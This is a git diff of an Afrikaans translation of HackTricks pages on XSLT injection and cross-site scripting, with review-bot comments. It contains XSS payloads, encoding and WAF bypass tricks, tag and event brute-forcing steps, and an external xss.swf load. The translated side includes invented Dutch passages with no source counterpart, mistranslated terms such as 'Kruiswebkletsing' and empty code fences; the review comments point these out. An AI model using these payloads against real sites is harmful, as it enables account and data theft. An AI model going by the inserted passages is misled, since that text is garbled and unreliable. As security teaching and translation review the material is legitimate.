@@ -353,9 +372,37 @@ Upload this and take information ``` +### **Xalan-J-uitbreiding** -### **Xalan-J extension** +Die Xalan-J-uitbreiding is 'n kragtige instrument wat gebruik kan word vir XSLT-serverkant-injeksie. Hierdie tegniek maak gebruik van die Xalan-J-biblioteek, wat 'n implementering van die Extensible Stylesheet Language Transformations (XSLT) is, om kwaadwillige kode uit te voer op die bedoelde bediener. +#### **Hoe werk dit?** + +Die Xalan-J-uitbreiding maak gebruik van die XSLT-verwerker om 'n aangepaste XSLT-stylvel te skep wat kwaadwillige instruksies bevat. Hierdie stylvel word dan aan die bediener gestuur vir verwerking. Die bediener, wat die Xalan-J-biblioteek gebruik, sal die stylvel interpreteer en die kwaadwillige instruksies uitvoer. + +#### **Voorbeelde van Xalan-J-uitbreiding** + +Hier is 'n paar voorbeelde van hoe die Xalan-J-uitbreiding gebruik kan word vir aanvalle: + +1. **Databasisinjeksie**: Die Xalan-J-uitbreiding kan gebruik word om kwaadwillige SQL-instruksies in te sluit in die aangepaste XSLT-stylvel. Hierdie instruksies kan dan uitgevoer word op die databasis wat deur die bediener gebruik word. + +2. **Lêerweergawe**: Die Xalan-J-uitbreiding kan gebruik word om lêers van die bediener te lees en hulle inhoud terug te stuur na die aanvaller. Dit kan gevoelige inligting soos wagwoorde, konfigurasie-lêers en ander belangrike data blootstel. + +3. **Uitvoering van stelseloproepe**: Die Xalan-J-uitbreiding kan gebruik word om stelseloproepe op die bediener uit te voer. Dit kan die aanvaller toelaat om beheer oor die bediener te verkry en verskeie kwaadwillige aksies uit te voer. + +#### **Beskerming teen Xalan-J-uitbreiding** + +Om te beskerm teen Xalan-J-uitbreiding, kan die volgende maatreëls geneem word: + +1. **Bepaalde toegang**: Beperk die toegang tot die Xalan-J-biblioteek en beperk die vermoë van die bediener om aangepaste XSLT-stylvelle te verwerk. + +2. 
**Invoervalidasie**: Voer streng invoervalidasie uit om te verseker dat slegs geldige en veilige invoer aanvaar word. + +3. **Sekuriteitspatches**: Verseker dat die bediener opgedateer is met die nuutste sekuriteitspatches om bekende kwesbaarhede te vermy. + +4. **Sekuriteitsbewustheid**: Verskaf opleiding aan ontwikkelaars en beheerders oor die risiko's van Xalan-J-uitbreiding en hoe om dit te voorkom. + +Deur hierdie maatreëls te implementeer, kan die risiko van Xalan-J-uitbreiding verminder word en die veiligheid van die bediener verhoog word. ```xml @@ -363,11 +410,9 @@ Upload this and take information ``` +Ander maniere om lêers in die PDF te skryf -Other ways to write files in the PDF - -## Include external XSL - +## Sluit eksterne XSL in ```xml ``` 
@@ -376,11 +421,9 @@ Other ways to write files in the PDF ``` - -## Execute code +## Voer kode uit ### **php:function** - ```xml ``` +Voer kode uit deur ander raamwerke in die PDF te gebruik -Execute code using other frameworks in the PDF +### **Meer tale** -### **More Languages** +**Op hierdie bladsy kan jy voorbeelde van RCE in ander tale vind:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)** -**In this page you can find examples of RCE in other languajes:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)** - -## **Access PHP static functions from classes** - -The following function will call the static method `stringToUrl` of the class XSL: +## **Kry toegang tot PHP statiese funksies vanaf klasse** +Die volgende funksie sal die statiese metode `stringToUrl` van die klas XSL aanroep: ```xml ``` +(Voorbeeld van [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls)) -(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls)) +## Meer Payloads +* Kontroleer [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection) +* Kontroleer [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) -## More Payloads -* Check 
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection) -* Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) - -## **Brute-Force Detection List** +## **Lys vir Brute-Force Deteksie** {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %} -## **References** +## **Verwysings** * [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT\_SSRF.pdf)\\ * [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\ @@ -445,12 +485,12 @@ version="1.0">
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
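Review bot: in the @@ -376,11 +421,9 @@ hunk the blank lines that separated prose from the fenced blocks are dropped on the `+` side, which is where the two-line shrink (11 to 9) comes from: `+Voer kode uit deur ander raamwerke in die PDF te gebruik` now follows the closing fence directly where the `-` side had a blank line, and `+## Meer Payloads` sits straight after the `(Voorbeeld van ...)` line. Restore those blank lines so the Markdown renders as before and the hunk stays a pure translation.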
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 5816b6692..45301cc99 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md 
@@ -1,113 +1,110 @@ -# XSS (Cross Site Scripting) +# XSS (Kruiswebkletsing) / -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bugbounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bugbounty-platform wat deur hackers, vir hackers** geskep is! Sluit vandag nog by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Methodology +## Metodologie -1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code. -2. **Find the context** where it's reflected/used. -3. If **reflected** - 1. Check **which symbols can you use** and depending on that, prepare the payload: - 1. In **raw HTML**: - 1. Can you create new HTML tags? - 2. Can you use events or attributes supporting `javascript:` protocol? - 3. Can you bypass protections? - 4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md). - 5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)? - 2. Inside a **HTML tag**: - 1. Can you exit to raw HTML context? - 2. Can you create new events/attributes to execute JS code? - 3. Does the attribute where you are trapped support JS execution? - 4. Can you bypass protections? - 3. Inside **JavaScript code**: - 1. 
Can you escape the ``** tags of a HTML page, inside a `.js` file or inside an attribute using **`javascript:`** protocol: - -* If reflected between **``** tags, even if your input if inside any kind of quotes, you can try to inject `` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `` tag is inside the HTML code. -* If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code (if there is any error, it won't be executed: - * `'-alert(1)-'` - * `';-alert(1)//` - * `\';alert(1)//` -* If reflected inside template literals you can **embed JS expressions** using `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` `` -* **Unicode encode** works to write **valid javascript code**: +In hierdie geval word jou inset weerspieël tussen **``**-etikette van 'n HTML-bladsy, binne 'n `.js`-lêer of binne 'n eienskap wat die **`javascript:`-protokol** gebruik: +* As dit weerspieël word tussen **``**-etikette, selfs al is jou inset binne enige soort aanhalingstekens, kan jy probeer om `` in te spuit en uit hierdie konteks te ontsnap. Dit werk omdat die **blaaier eers die HTML-etikette sal ontled** en dan die inhoud, daarom sal dit nie besef dat jou ingespotte ``-etiket binne die HTML-kode is nie. +* As dit **binne 'n JS-string** weerspieël word en die vorige truuk nie werk nie, sal jy die string moet **verlaat**, jou kode **uitvoer** en die JS-kode **herkonstrueer** (as daar enige foute is, sal dit nie uitgevoer word nie): +* `'-alert(1)-'` +* `';-alert(1)//` +* `\';alert(1)//` +* As dit binne sjabloontekens weerspieël word, kan jy **JS-uitdrukkings inbed** deur die `${ ... 
}`-sintaksis te gebruik: `` var greetings = `Hello, ${alert(1)}` `` +* **Unicode-kodering** werk om **geldige javascript-kode** te skryf: ```javascript \u{61}lert(1) \u0061lert(1) \u{0061}lert(1) ``` - #### Javascript Hoisting -Javascript Hoisting references the opportunity to **declare functions, variables or classes after they are used so you can abuse scenarios where a XSS is using undeclared variables or functions.**\ -**Check the following page for more info:** +Javascript Hoisting verwys na die geleentheid om funksies, veranderlikes of klasse te verklaar nadat hulle gebruik is, sodat jy situasies kan misbruik waar 'n XSS onverklaarde veranderlikes of funksies gebruik.\ +**Kyk na die volgende bladsy vir meer inligting:** {% content-ref url="js-hoisting.md" %} [js-hoisting.md](js-hoisting.md) {% endcontent-ref %} -### Javascript Function +### Javascript Funksie -Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`. +Verskeie webbladsye het eindpunte wat **die naam van die funksie aanvaar as parameter om uit te voer**. 'n Algemene voorbeeld wat jy in die wild kan sien, is iets soos: `?callback=callbackFunc`. -A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like: +'n Goeie manier om uit te vind of iets wat direk deur die gebruiker gegee word, probeer uitgevoer word, is deur die param-waarde te **verander** (byvoorbeeld na 'Vulnerable') en in die konsole te kyk vir foute soos: ![](<../../.gitbook/assets/image (651) (2).png>) -In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**). 
+In die geval dat dit kwesbaar is, kan jy in staat wees om 'n waarskuwing te **trigger** deur net die waarde te stuur: **`?callback=alert(1)`**. Dit is egter baie algemeen dat hierdie eindpunte die inhoud sal **valideer** om slegs letters, syfers, punte en onderstreepstrepe toe te laat (**`[\w\._]`**). -However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**: +Nogtans is dit steeds moontlik om sekere aksies uit te voer, selfs met daardie beperking. Dit is omdat jy daardie geldige karakters kan gebruik om enige element in die DOM te **toegang**: ![](<../../.gitbook/assets/image (662).png>) -Some useful functions for this: - +Sommige nuttige funksies hiervoor: ``` firstElementChild lastElementChild @@ -115,12 +112,11 @@ nextElementSibiling lastElementSibiling parentElement ``` +Jy kan ook probeer om **Javascript funksies te aktiveer** direk: `obj.sales.delOrders`. -You can also try to **trigger Javascript functions** directly: `obj.sales.delOrders`. +Gewoonlik is die eindpunte wat die aangeduide funksie uitvoer eindpunte sonder veel interessante DOM, **ander bladsye in dieselfde oorsprong** sal 'n **meer interessante DOM** hê om meer aksies uit te voer. -However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, **other pages in the same origin** will have a **more interesting DOM** to perform more actions. - -Therefore, in order to **abuse this vulnerability in a different DOM** the **Same Origin Method Execution (SOME)** exploitation was developed: +Daarom is die **Same Origin Method Execution (SOME)** uitbuiting ontwikkel om hierdie kwesbaarheid in 'n ander DOM te **misbruik**: {% content-ref url="some-same-origin-method-execution.md" %} [some-same-origin-method-execution.md](some-same-origin-method-execution.md) 
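Review bot: two points in @@ -1,113 +1,110 @@. First, the title `+# XSS (Kruiswebkletsing)` coins a word that reads as "cross web chatting"; keep the established English name, as this same hunk already does for "Javascript Hoisting" and "Same Origin Method Execution (SOME)", e.g. `# XSS (Cross Site Scripting)`. Second, the nested payload bullets lose their indentation: `- * `'-alert(1)-'`` becomes `+* `'-alert(1)-'``, so the three payloads now render as top-level items instead of sub-items of the "binne 'n JS-string" bullet; re-indent them. Small spelling fix: `ingespotte` should be `ingespuite`.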
@@ -128,16 +124,16 @@ Therefore, in order to **abuse this vulnerability in a different DOM** the **Sam ### DOM -There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code. +Daar is **JS-kode** wat **onveilig** gebruik maak van **data wat deur 'n aanvaller beheer word**, soos `location.href`. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer. {% content-ref url="dom-xss.md" %} [dom-xss.md](dom-xss.md) {% endcontent-ref %} -### **Universal XSS** +### **Universele XSS** -These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.\ -Some **examples**: +Hierdie soort XSS kan **oral** gevind word. Dit hang nie net af van die kliënt-uitbuiting van 'n webtoepassing nie, maar van **enige** **konteks**. Hierdie soort **willekeurige JavaScript-uitvoering** kan selfs misbruik word om **RCE** te verkry, **willekeurige** **lêers** in kliënte en bedieners te **lees**, en nog meer.\ +Sommige **voorbeelde**: {% content-ref url="server-side-xss-dynamic-pdf.md" %} [server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md) 
@@ -147,43 +143,38 @@ Some **examples**: [electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) {% endcontent-ref %} -## WAF bypass encoding image +## WAF omseilingskodering van beeld -![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg) +![vanaf https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg) -## Injecting inside raw HTML +## Injekteer binne rou HTML -When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ -For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using `-->` or `--!>`**_ - -In this case and if no black/whitelisting is used, you could use payloads like: +Wanneer jou inset **binne die HTML-bladsy** weerspieël word of jy HTML-kode kan ontsnap en injekteer in hierdie konteks, is die **eerste** ding wat jy moet doen, om te kyk of jy die `<` kan misbruik om nuwe etikette te skep: Probeer net om daardie **karakter** te **weerspieël** en kyk of dit **HTML-gekodeer** of **verwyder** word, of as dit **weerspieël word sonder veranderinge**. 
**Slegs in die laaste geval sal jy hierdie geval kan uitbuit**.\ +Vir hierdie gevalle moet jy ook **onthou** van [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ +_**Nota: 'n HTML-kommentaar kan gesluit word met `-->` of `--!>`**_ +In hierdie geval, as geen swart-/witlys gebruik word nie, kan jy payloads gebruik soos: ```html ``` +Maar, as tags/atribute swart/lys gebruik word, sal jy nodig hê om te **brute-force watter tags** jy kan skep.\ +Sodra jy **gevind het watter tags toegelaat word**, sal jy nodig hê om **brute-force atribute/gebeure** binne die gevonde geldige tags te doen om te sien hoe jy die konteks kan aanval. -But, if tags/attributes black/whitelisting is being used, you will need to **brute-force which tags** you can create.\ -Once you have **located which tags are allowed**, you would need to **brute-force attributes/events** inside the found valid tags to see how you can attack the context. +### Tags/Gebeure brute-force -### Tags/Events brute-force +Gaan na [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) en klik op _**Kopieer tags na knipbord**_. Stuur dan almal deur gebruik te maak van Burp intruder en kyk of enige tags nie as skadelik deur die WAF ontdek is nie. Sodra jy uitgevind het watter tags jy kan gebruik, kan jy **brute force al die gebeure** gebruik deur die geldige tags (op dieselfde webbladsy klik op _**Kopieer gebeure na knipbord**_ en volg dieselfde prosedure as voorheen). -Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. 
Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags (in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before). - -### Custom tags - -If you didn't find any valid HTML tag, you could try to **create a custom tag** and and execute JS code with the `onfocus` attribute. In the XSS request, you need to end the URL with `#` to make the page **focus on that object** and **execute** the code: +### Aangepaste tags +As jy nie enige geldige HTML-tag gevind het nie, kan jy probeer om **'n aangepaste tag te skep** en JS-kode uit te voer met die `onfocus` atribuut. In die XSS-versoek, moet jy die URL beëindig met `#` om die bladsy **te fokus op daardie voorwerp** en die kode **uit te voer**: ``` /?search=#x ``` +### Swartlys Verbygaan -### Blacklist Bypasses - -If some kind of blacklist is being used you could try to bypass it with some silly tricks: - +As 'n soort swartlys gebruik word, kan jy probeer om dit te verbygaan met 'n paar dom truuks: ```javascript //Random capitalization
+``` + +Om stylgebeure te voorkom, moet webontwikkelaars insette van gebruikers behoorlik valideer en ontsmet. Dit kan gedoen word deur die gebruik van 'n HTML-sanitiseringsbiblioteek of deur die implementering van 'n beperkte witlys van toelaatbare CSS-eienskappe en waardes. ```python

XSS

XSS

@@ -282,18 +279,16 @@ If you **cannot escape from the tag**, you could create new attributes inside th #moving your mouse anywhere over the page (0-click-ish):
``` +### Binne die eienskap -### Within the attribute +Selfs as jy **nie kan ontsnap uit die eienskap nie** (`"` word gekodeer of verwyder), afhangende van **watter eienskap** jou waarde weerspieël as jy al die waarde beheer of net 'n deel daarvan, sal jy dit kan misbruik. By **voorbeeld**, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit kan maak om willekeurige kode uit te voer wanneer dit geklik word.\ +'n Ander interessante **voorbeeld** is die eienskap `href`, waar jy die `javascript:` protokol kan gebruik om willekeurige kode uit te voer: **`href="javascript:alert(1)"`** -Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\ -Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`** +**Deurkruising binne die gebeurtenis deur HTML-kodering/URL-kodering te gebruik** -**Bypass inside event using HTML encoding/URL encode** - -The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `Go Back ` - -Note that **any kind of HTML encode is valid**: +Die **HTML-gekodeerde karakters** binne die waarde van HTML-etiketseienskappe word **tydens uitvoering gedekodeer**. Daarom sal iets soos die volgende geldig wees (die payload is vetgedruk): `Go Back ` +Let daarop dat **enige soort HTML-kodering geldig is**: ```javascript //HTML entities '-alert(1)-' 
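Review bot: `+**Deurkruising binne die gebeurtenis deur HTML-kodering/URL-kodering te gebruik**` in @@ -282,18 +279,16 @@ renders "Bypass" as "Deurkruising" (crossing through) while the rest of this patch uses "omseiling" for bypass; use `Omseiling binne die gebeurtenis ...`. The blank lines around `+Die **HTML-gekodeerde karakters** ...` are also dropped (18 to 16 lines), so the bold heading, the paragraph and `+Let daarop dat ...` will merge into a single Markdown paragraph; keep the blank lines from the `-` side. Minor: `By **voorbeeld**` should be `**Byvoorbeeld**`.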
@@ -310,25 +305,37 @@ Note that **any kind of HTML encode is valid**: a a ``` - -**Note that URL encode will also work:** - +**Let wel dat URL-kodering ook sal werk:** ```python Click ``` +**Deurloop binne-gebeurtenis deur gebruik te maak van Unicode-kodering** -**Bypass inside event using Unicode encode** +Om XSS-filters te omseil wat binnen-gebeurtenissen (zoals onclick, onmouseover, enz.) controleren, kan Unicode-kodering worden gebruikt. Dit houdt in dat speciale tekens worden vervangen door hun Unicode-equivalenten. +Bijvoorbeeld, het karakter `<` kan worden vervangen door `\u003c` en het karakter `>` kan worden vervangen door `\u003e`. Op deze manier kan kwaadaardige code worden ingevoegd zonder dat deze wordt gedetecteerd door de XSS-filter. + +Hier is een voorbeeld van hoe dit kan worden gedaan: + +```html + +``` + +Dit kan worden omgezet naar: + +```html + +``` + +Op deze manier kan de kwaadaardige code worden uitgevoerd wanneer de binnen-gebeurtenis wordt geactiveerd. Het is echter belangrijk op te merken dat deze techniek mogelijk niet altijd werkt, afhankelijk van de specifieke implementatie van de XSS-filter. ```javascript //For some reason you can use unicode to encode "alert" but not "(1)" ``` +### Spesiale Protokolle binne die eienskap -### Special Protocols Within the attribute - -There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't. - +Daar kan jy die protokolle **`javascript:`** of **`data:`** gebruik op sekere plekke om **arbitrêre JS-kode uit te voer**. Sommige sal gebruikerinteraksie vereis en ander nie. ```javascript javascript:alert(1) JavaSCript:alert(1) @@ -337,7 +344,7 @@ javascript:alert(1) javascript:alert(1) javascript:alert(1) javascriptΪlert(1) -java //Note the new line +java //Note the new line script:alert(1) data:text/html, 
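Review bot: the block under `+**Deurloop binne-gebeurtenis deur gebruik te maak van Unicode-kodering**` in @@ -310,25 +305,37 @@ is not a translation. The `-` side had only the bold heading followed by the ```javascript block, while the `+` side adds five paragraphs plus two empty ```html fences, and the added text is Dutch ("Om XSS-filters te omseil wat binnen-gebeurtenissen (zoals onclick, onmouseover, enz.) controleren ..."), not Afrikaans. Remove the additions and keep just the translated heading, using "Omseiling" rather than "Deurloop" for consistency with the rest of the file. In @@ -337,7 +344,7 @@ the only change is whitespace in `java //Note the new line` inside a code block; a translation commit should leave code blocks byte-for-byte, and here the line break before `script:alert(1)` is exactly what the comment points at.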
@@ -348,11 +355,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg  A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== ``` +**Plekke waar jy hierdie protokolle kan inspuit** -**Places where you can inject these protocols** - -**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not ` @@ -368,33 +373,27 @@  A6Ly93d3cudzMub3JnLzIwMDAvc //Special cases - .//https://github.com/evilcos/xss.swf - //https://github.com/evilcos/xss.swf + .//https://github.com/evilcos/xss.swf + //https://github.com/evilcos/xss.swf ``` +Let daarop dat as jy probeer om **beide** `URLencode + HTMLencode` in enige volgorde te gebruik om die **payload** te enkodeer, sal dit **nie werk nie**, maar jy kan hulle **binne die payload meng**. -Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**. - -**Using Hex and Octal encode with `javascript:`** - -You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` (at least) to declare **HTML tags to execute JS**: +**Die gebruik van Hex en Octal enkodeer met `javascript:`** +Jy kan **Hex** en **Octal enkodeer** binne die `src` eienskap van `iframe` (ten minste) gebruik om **HTML-etikette uit te voer**: ```javascript //Encoded: // This WORKS 
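Review bot: in @@ -368,33 +373,27 @@ the two `.//https://github.com/evilcos/xss.swf` lines change only in leading whitespace inside the code block; leave code untouched in a translation commit. The sentence `+Jy kan **Hex** en **Octal enkodeer** binne die `src` eienskap van `iframe` (ten minste) gebruik om **HTML-etikette uit te voer**` also drops the point of "declare HTML tags to execute JS" and now says the HTML tags themselves are executed; suggest `... om HTML-etikette te verklaar wat JS uitvoer`, and use "Hex- en oktaalkodering", the form this file uses later, instead of "Hex en Octal enkodeer". The blank lines before `**Die gebruik van Hex ...**` and before the ```javascript fence are gone as well (33 to 27 lines); restore them.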
@@ -406,14 +405,17 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` ``` +### Omgekeerde tab nabbing -### Reverse tab nabbing +Reverse tab nabbing is een aanvalstechniek die wordt gebruikt om gebruikers te misleiden en hun vertrouwelijke informatie te stelen. Bij deze aanval wordt een kwaadwillende website gemaakt die eruitziet als een legitieme website waar de gebruiker al ingelogd is. Wanneer de gebruiker op een link klikt en naar een andere tabblad navigeert, wordt het oorspronkelijke tabblad vervangen door de kwaadwillende website. Hierdoor kan de aanvaller de inloggegevens en andere vertrouwelijke informatie van de gebruiker stelen. +Om deze aanval uit te voeren, maakt de aanvaller gebruik van JavaScript om de locatie van het oorspronkelijke tabblad te wijzigen naar de kwaadwillende website. Dit kan worden bereikt door de `window.opener.location` eigenschap te wijzigen. Zodra het oorspronkelijke tabblad is vervangen, kan de aanvaller de ingevoerde gegevens onderscheppen en deze naar een externe server sturen. + +Om jezelf te beschermen tegen reverse tab nabbing, is het belangrijk om altijd alert te zijn op verdachte websites en links. Zorg ervoor dat je alleen vertrouwde websites bezoekt en vermijd het klikken op verdachte links. Daarnaast is het ook aan te raden om een up-to-date antivirusprogramma en een firewall te gebruiken om jezelf te beschermen tegen dergelijke aanvallen. ```javascript //No safari 
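Review bot: the three paragraphs added under `+### Omgekeerde tab nabbing` in @@ -406,14 +405,17 @@ have no `-` counterpart (the source had the heading and then the ```javascript block) and are Dutch rather than Afrikaans ("Reverse tab nabbing is een aanvalstechniek die wordt gebruikt om gebruikers te misleiden ..."). They also close with generic end-user advice about antivirus software and firewalls that has nothing to do with the code block that follows. Drop them so the hunk only translates the heading.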
@@ -438,18 +439,14 @@ Firefox: %09 %20 %28 %2C %3B Opera: %09 %20 %2C %3B Android: %09 %20 %28 %2C %3B ``` +### XSS in "Onuitbuitbare etikette" (verborge invoer, skakel, kanonieke, meta) -### XSS in "Unexploitable tags" (hidden input, link, canonical, meta) - -From [**here**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **it's now possible to abuse hidden inputs with:** - +Vanaf [**hier**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **is dit nou moontlik om verborge invoere te misbruik met:** ```html @@ -457,84 +454,76 @@ And in **meta tags**:
Newsletter popup
